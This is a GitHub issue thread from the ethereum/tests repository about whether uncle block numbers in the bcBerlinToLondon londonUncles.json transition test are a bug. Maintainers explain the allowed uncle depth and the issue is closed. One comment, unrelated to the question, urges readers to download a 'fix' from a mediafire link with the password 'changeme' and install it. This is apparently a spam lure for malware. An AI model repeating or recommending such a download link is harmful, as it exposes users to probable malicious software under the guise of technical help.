### ISSUE TITLE
Uncle block number in bcBerlinToLondon Transition tests Question

### ISSUE THREAD

**Issue by holgerd77** [ethereum/tests#1398]
In the `londonUncles.json` transition tests there is a wrong uncles block number (4) for block number 5, see https://github.com/ethereum/tests/blob/fd26aad70e24f042fcd135b2f0338b1c6bf1a324/BlockchainTests/TransitionTests/bcBerlinToLondon/londonUncles.json#L158 .

Is this intended for some reason (I could imagine that uncle header number is just not checked by specification, unlikely though?). Or is this a bug?

**Comment by holgerd77** [comment]
Ah, just seeing, this (wrong uncle block number) is the case for the following blocks as well.

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by winsvega** [comment]
Hm? Block5 includes version of block4 as uncle.

**Comment by gumb0** [comment]
Looks correct to me, uncle can be a sibling to one of 6 of this block's ancestors (`block.number - 6 <= uncle.number <= block.number - 1`)

**Comment by holgerd77** [comment]
Thanks, yes, we have discussed/researched this internally and came to the same conclusion! 🙂 Will close.

**Comment by winsvega** [comment]
hm, wait, why is it a wrong number ?
